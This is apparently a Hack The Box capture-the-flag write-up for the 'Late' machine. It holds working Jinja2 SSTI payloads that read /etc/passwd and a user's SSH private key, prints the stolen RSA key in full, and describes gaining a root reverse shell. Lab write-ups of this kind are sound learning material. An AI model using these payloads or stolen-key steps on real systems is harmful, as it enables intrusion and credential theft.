Late - Easy

Late is an Easy linux box, let’s get to enumeration.

Information Gathering

┌──(kali㉿kali)-[~/Downloads/ctf/htb/Late]
└─$ export IP=10.10.11.156

┌──(kali㉿kali)-[~/Downloads/ctf/htb/Late]
└─$ nmap $IP                       
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-28 07:52 EDT
Nmap scan report for 10.10.11.156
Host is up (0.55s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 226.62 seconds

Let’s perform an initial scan to identify the ports and services that are running on the system

┌──(kali㉿kali)-[~/Downloads/ctf/htb/Late]
└─$ sudo nmap -Pn -sC -sV -T4 $IP
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-28 07:58 EDT
Nmap scan report for 10.10.11.156
Host is up (0.38s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
|   256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_  256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.10 seconds

Add the $IP to /etc/hosts ie late.htb

Go to late.htb and inspect the webpage.

While going through the webpage, we find a link in one of the questions that leads to the subdomain images.late.htb

Add the subdomain to /etc/hosts file.

Enumeration

On the images.late.htb we have a webpage with an upload feature that converts text on image to plain text.

We can try and manipulate the feature and see whether it’s vulnerable to SSTI since it’s running on flask.

I used the payload {{7*7}} to check for presence of SSTI vulnerability.

Convert the text to image using https://cloudconvert.com/ then upload the payload which in turn gives us a results.txt file.

From this we can see that the site is vulnerable to SSTI as it solved it.

More research can be found in book.hacktricks.xyz

We use a one liner payload as below, convert it the payload to image and upload it to get hold of /etc/passwd file.

{{(''.__class__).__mro__[1].__subclasses__()[249]("cat /etc/passwd", stdout=-1,shell=True).communicate() }}

Which gives us a results of:

┌──(kali㉿kali)-[~/…/ctf/htb/Late/images]
└─$ cat resultsss.txt                                              
<p>(b&#39;root:x:0:0:root:/root:/bin/bash\n
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n
bin:x:2:2:bin:/bin:/usr/sbin/nologin\n
sys:x:3:3:sys:/dev:/usr/sbin/nologin\n
sync:x:4:65534:sync:/bin:/bin/sync\n
games:x:5:60:games:/usr/games:/usr/sbin/nologin\n
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin\n
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\n
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin\n
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin\n
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\n
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\n
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\n
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin\n
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin\n
syslog:x:102:106::/home/syslog:/usr/sbin/nologin\n
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin\n
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin\n
lxd:x:105:65534::/var/lib/lxd/:/bin/false\n
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin\n
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin\n
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin\n
pollinate:x:109:1::/var/cache/pollinate:/bin/false\n
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin\n
svc_acc:x:1000:1000:Service Account:/home/svc_acc:/bin/bash\n
rtkit:x:111:114:RealtimeKit,,,:/proc:/usr/sbin/nologin\n
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin\n
avahi:x:113:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin\n
cups-pk-helper:x:114:117:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin\n
saned:x:115:119::/var/lib/saned:/usr/sbin/nologin\n
colord:x:116:120:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin\n
pulse:x:117:121:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin\n
geoclue:x:118:123::/var/lib/geoclue:/usr/sbin/nologin\n
smmta:x:119:124:Mail Transfer Agent,,,:/var/lib/sendmail:/usr/sbin/nologin\n
smmsp:x:120:125:Mail Submission Program,,,:/var/lib/sendmail:/usr/sbin/nologin\n
&#39;, None)

From this, the account svc_acc is of great interest as it’s home folder is home/svc_acc

We can try to get the ssh key and use port 22 to log into the svc_acc account. We can find the SSH key by modifying the payload to get : ~/.ssh/id_rsa and modifying the text to image then uploading it to images.late.htb

{{(''.__class__).__mro__[1].__subclasses__()[249]("cat ~/.ssh/id_rsa", stdout=-1,shell=True).communicate() }}

This gives us the following key:

┌──(kali㉿kali)-[~/Downloads/ctf/htb/Late]
└─$ cat results.txt              
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAqe5XWFKVqleCyfzPo4HsfRR8uF/P/3Tn+fiAUHhnGvBBAyrM
HiP3S/DnqdIH2uqTXdPk4eGdXynzMnFRzbYb+cBa+R8T/nTa3PSuR9tkiqhXTaEO
bgjRSynr2NuDWPQhX8OmhAKdJhZfErZUcbxiuncrKnoClZLQ6ZZDaNTtTUwpUaMi
/mtaHzLID1KTl+dUFsLQYmdRUA639xkz1YvDF5ObIDoeHgOU7rZV4TqA6s6gI7W7
d137M3Oi2WTWRBzcWTAMwfSJ2cEttvS/AnE/B2Eelj1shYUZuPyIoLhSMicGnhB7
7IKpZeQ+MgksRcHJ5fJ2hvTu/T3yL9tggf9DsQIDAQABAoIBAHCBinbBhrGW6tLM
fLSmimptq/1uAgoB3qxTaLDeZnUhaAmuxiGWcl5nCxoWInlAIX1XkwwyEb01yvw0
ppJp5a+/OPwDJXus5lKv9MtCaBidR9/vp9wWHmuDP9D91MKKL6Z1pMN175GN8jgz
W0lKDpuh1oRy708UOxjMEalQgCRSGkJYDpM4pJkk/c7aHYw6GQKhoN1en/7I50IZ
uFB4CzS1bgAglNb7Y1bCJ913F5oWs0dvN5ezQ28gy92pGfNIJrk3cxO33SD9CCwC
T9KJxoUhuoCuMs00PxtJMymaHvOkDYSXOyHHHPSlIJl2ZezXZMFswHhnWGuNe9IH
Ql49ezkCgYEA0OTVbOT/EivAuu+QPaLvC0N8GEtn7uOPu9j1HjAvuOhom6K4troi
WEBJ3pvIsrUlLd9J3cY7ciRxnbanN/Qt9rHDu9Mc+W5DQAQGPWFxk4bM7Zxnb7Ng
Hr4+hcK+SYNn5fCX5qjmzE6c/5+sbQ20jhl20kxVT26MvoAB9+I1ku8CgYEA0EA7
t4UB/PaoU0+kz1dNDEyNamSe5mXh/Hc/mX9cj5cQFABN9lBTcmfZ5R6I0ifXpZuq
0xEKNYA3HS5qvOI3dHj6O4JZBDUzCgZFmlI5fslxLtl57WnlwSCGHLdP/knKxHIE
uJBIk0KSZBeT8F7IfUukZjCYO0y4HtDP3DUqE18CgYBgI5EeRt4lrMFMx4io9V3y
3yIzxDCXP2AdYiKdvCuafEv4pRFB97RqzVux+hyKMthjnkpOqTcetysbHL8k/1pQ
GUwuG2FQYrDMu41rnnc5IGccTElGnVV1kLURtqkBCFs+9lXSsJVYHi4fb4tZvV8F
ry6CZuM0ZXqdCijdvtxNPQKBgQC7F1oPEAGvP/INltncJPRlfkj2MpvHJfUXGhMb
Vh7UKcUaEwP3rEar270YaIxHMeA9OlMH+KERW7UoFFF0jE+B5kX5PKu4agsGkIfr
kr9wto1mp58wuhjdntid59qH+8edIUo4ffeVxRM7tSsFokHAvzpdTH8Xl1864CI+
Fc1NRQKBgQDNiTT446GIijU7XiJEwhOec2m4ykdnrSVb45Y6HKD9VS6vGeOF1oAL
K6+2ZlpmytN3RiR9UDJ4kjMjhJAiC7RBetZOor6CBKg20XA1oXS7o1eOdyc/jSk0
kxruFUgLHh7nEx/5/0r8gmcoCvFn98wvUPSNrgDJ25mnwYI0zzDrEw==
-----END RSA PRIVATE KEY-----

Rename this file to id_rsa then do the following:

┌──(kali㉿kali)-[~/Downloads/ctf/htb/Late]
└─$ chmod 600 id_rsa

ssh into the file and you will be able to get into the account svc_acc

We’ve been able to get the user.txt flag, now we can be move on and see if we can get the root.txt flag.

Privilege Escalation

Upload linpeas and run it.

Running linpeas gets us a very interesting flag that we can look at.

The script is executable, therefore we can embed our malicious payload and listen on another terminal to get a reverse shell as root user.

Once we are in we can checkout the root directory for the root flag.

TADAAAAAAAAAAAAAHHHHHHHHHH and we are done!!!

Late - Easy

Information Gathering

Enumeration

Privilege Escalation

Read more

TryHackMe - Post-Exploitation Basics Walkthrough